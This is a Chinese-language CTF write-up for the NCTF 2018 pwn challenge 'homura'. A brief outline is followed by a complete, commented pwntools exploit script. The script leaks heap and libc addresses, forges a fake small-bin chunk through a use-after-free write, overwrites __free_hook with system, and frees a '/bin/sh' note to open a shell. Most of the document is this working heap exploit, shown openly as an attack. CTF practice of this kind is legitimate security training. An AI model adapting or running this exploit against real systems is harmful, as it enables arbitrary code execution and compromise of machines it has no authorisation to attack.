
nctf2018的pwn题homura的exp思路及脚本


思路

1.创建 note 时把 name 长度传为 -1，跳过 name 的输入，再借助 modify 时回显的 "Hello <name>" 泄露 heap 地址
2.篡改 unsorted bin 中空闲块的 bk 指针（脚本中对已经 remove 的 index 再次 modify，即 UAF 写），把伪造的堆块挂入 small bin（该版本在此路径上未校验 fd/bk 指针，也就是双向链表的合法性）
3.控制堆上 note 的 name 和 buf 指针：先泄露 libc 基址，再把 system 地址写入 __free_hook，最后 free 一个 name 为 "/bin/sh" 的 note 触发 system("/bin/sh")

完整exp

from pwn import *

def ru(data,drop=False):
    """Receive from the target until ``data`` appears (recvuntil shorthand).

    ``drop`` is forwarded unchanged: True strips the delimiter from the result.
    """
    got = p.recvuntil(data, drop=drop)
    return got

def rl():
    """Receive a single line (newline included) from the target."""
    line = p.recvline()
    return line

def ra():
    """Drain everything the target sends until it closes the connection."""
    rest = p.recvall()
    return rest

def r(l):
    """Receive up to ``l`` bytes from the target."""
    chunk = p.recv(l)
    return chunk

def sl(data):
    """Send ``data`` followed by a newline (menu answers, sizes, indices)."""
    p.sendline(data)
    return None

def s(data):
    """Send ``data`` raw, with no trailing newline (used for the name field)."""
    p.send(data)
    return None

def ga(data,rd="\x0a"):
    """Grab an address the target echoes.

    Skips to ``data``, then reads up to (and drops) the delimiter ``rd``.
    The raw bytes are right-padded with NULs to 8 bytes and decoded as a
    little-endian u64, so a pointer printed without its high zero bytes still
    comes back as a full integer.
    """
    ru(data)
    raw = ru(rd, drop=True)
    padded = raw.ljust(8, "\x00")
    return u64(padded)

def g():
    """Attach gdb to the live target, then block until Enter is pressed."""
    gdb.attach(p)
    ri()

def ri():
    """Pause the exploit until the operator presses Enter.

    Meant for manual debugger attachment between heap operations.
    """
    _ = raw_input()

def gp():
    """Print the target's pid (for attaching a debugger by hand) and pause."""
    pid = proc.pidof(p)[0]
    print(pid)
    ri()

def add(nl,n,ml,m):
    """Menu option 1: create a note.

    nl -- value answered to "length of your name:"; when it is -1 the script
          sends nothing for the name and does not wait for a name prompt
    n  -- name bytes, sent raw (include the trailing newline yourself)
    ml -- value answered to "size of your message:"
    m  -- message body, sent with a trailing newline
    """
    ru(">>")
    sl("1")
    ru("length of your name:")
    sl(str(nl))
    if nl != -1:
        # Only a real length is followed by the name prompt.
        ru("your name:")
        s(n)
    ru("size of your message:")
    sl(str(ml))
    ru("please leave your message:")
    sl(m)

def remove(idx):
    """Menu option 2: delete (free) the note at ``idx``."""
    ru(">>")
    sl("2")
    ru("index:")
    sl(str(idx))

def modfiy(idx,s,m):
    """Menu option 3: overwrite ``s`` bytes of note ``idx`` with ``m``.

    The name is kept as spelled in the original script because callers use
    it verbatim. Note that the parameter ``s`` shadows the module-level
    ``s()`` send helper inside this function; the payload goes out via ``sl``.
    """
    ru(">>")
    sl("3")
    ru("index:")
    sl(str(idx))
    ru("size:")
    sl(str(s))
    ru(">")
    sl(m)

def leak(idx,s,m):
    """Menu option 3, additionally capturing the address the target echoes.

    After the size is sent the target prints "Hello <name> you"; the bytes
    between "Hello " and " you" are decoded as a little-endian u64 and
    returned. ``m`` is then written as the new content, just like ``modfiy``.
    """
    ru(">>")
    sl("3")
    ru("index:")
    sl(str(idx))
    ru("size:")
    sl(str(s))
    addr = ga('Hello ', ' you')
    ru(">")
    sl(m)
    return addr


if __name__ == '__main__':
    # context.log_level = "debug"
    # The libc shipped with the challenge. The hard-coded main_arena offset
    # below only makes sense for this exact build.
    libc = ELF("./libc.so.6")
    # Local run only; swap for remote(host, port) against the real target.
    p = process('./homura')
    # Step 1 (heap leak): three notes whose message allocation is 0x90 bytes,
    # large enough that the frees below do not end up in fastbins.
    add(12,'1'*10+'\n',0x90,'a'*0x80) #0
    add(12,'2'*10+'\n',0x90,'b'*0x80) #1
    add(12,'3'*10+'\n',0x90,'c'*0x80) #2
    remove(1)
    remove(0)
    # Re-create index 0 without supplying a name (nl == -1), so the note's
    # name field presumably still holds whatever the recycled chunk contained.
    add(-1,'',0x90,'d'*0x80) #0
    # The "Hello <name>" echo in modify leaks that stale heap pointer.
    heap = leak(0,0x80,'x'*0x60)
    print hex(heap)
    add(12,'2'*10+'\n',0x90,'h'*0x80) #1
    #
    # Step 2 (fake chunk): note 3's message ends with a forged chunk header
    # (prev_size 0, size 0xc1) whose fd/bk point into the heap. Offsets such
    # as heap+0x320 / heap+0x420 are layout-specific -- re-derive them in gdb
    # if the binary or libc differs.
    add(0x10,'4'*8+'\n',0xa0,'d'*0x60+p64(0)+p64(0xc1)+p64(heap+0x320)+p64(heap+0x420)) # 3
    # fake chunk:  prev_size 0 | size 0xc1
    #              fd heap+0x320 | bk heap+0x420
    # Note 4 carries a prev_size of 0xc0 matching the fake chunk's size, plus
    # a 0x91 size field, so the fake chunk looks consistent to the allocator.
    add(0x10,'5'*8+'\n',0xa0,'e'*0x20+p64(0xc0)+p64(0x91)) #4
    add(0x10,'6'*8+'\n',0xa0,'f'*0x80) #5
    add(0x10,'7'*8+'\n',0xa0,'g'*0x80) #6
    modfiy(4,0x80,'z'*0x10)
    remove(3)
    remove(4)
    remove(5)
    # gp()
    # UAF write: index 4 was just freed but can still be modified. This
    # overwrites the freed chunk's fd/bk, which is the "forge the bk" step
    # from the writeup -- the target side apparently does not validate the
    # doubly-linked list here, so the fake chunk gets linked in.
    modfiy(4,0x80,p64(heap+0x220)+p64(heap+0x290))
    add(0x10,'8'*8+'\n',0x90,'h'*0x3) # 3
    add(0x10,'9'*8+'\n',0xa0,'k'*0x3) # 4
    # Step 3: note 5's message overlaps a note record. The 0x21 header and the
    # two pointers (heap+0x430, heap+0x330) presumably become another note's
    # name/buf pointers, giving arbitrary read/write through modify -- confirm
    # the record layout in the binary.
    add(0x10,'8'*8+'\n',0xa0,p64(0)*9+p64(0x21)+p64(heap+0x430)+p64(heap+0x330)) # 5
    # Offset of main_arena inside this particular libc. It is not exported as
    # a symbol, so it is hard-coded; for another libc, recompute it (e.g. from
    # __malloc_hook) instead of reusing this value.
    main_arena = 0x3C4B20
    # The leaked pointer lands 0x108 bytes into main_arena (bin pointer);
    # subtracting both offsets yields the libc base.
    libc_addr = leak(4,0x80,'z') - 0x108 - main_arena 
    print hex(libc_addr)
    free_hook = libc_addr + libc.symbols['__free_hook']
    print hex(free_hook)
    system_addr = libc_addr + libc.symbols['system']
    add(0x10,'9'*8+'\n',0xa0,'x'*0x3) # 7
    # gp()
    # Re-create note 5 with name "/bin/sh" and point the controlled pointer
    # at __free_hook, so modifying index 4 writes to the hook.
    remove(5)
    add(0x10,'/bin/sh\x00'+'\n',0xa0,p64(0)*9+p64(0x21)+p64(heap+0x430)+p64(free_hook))#5
    # __free_hook = system
    modfiy(4,0x10,p64(system_addr))
    # gp()
    # Freeing note 5 calls free() on its "/bin/sh" buffer, i.e. system("/bin/sh").
    remove(5)
    p.interactive()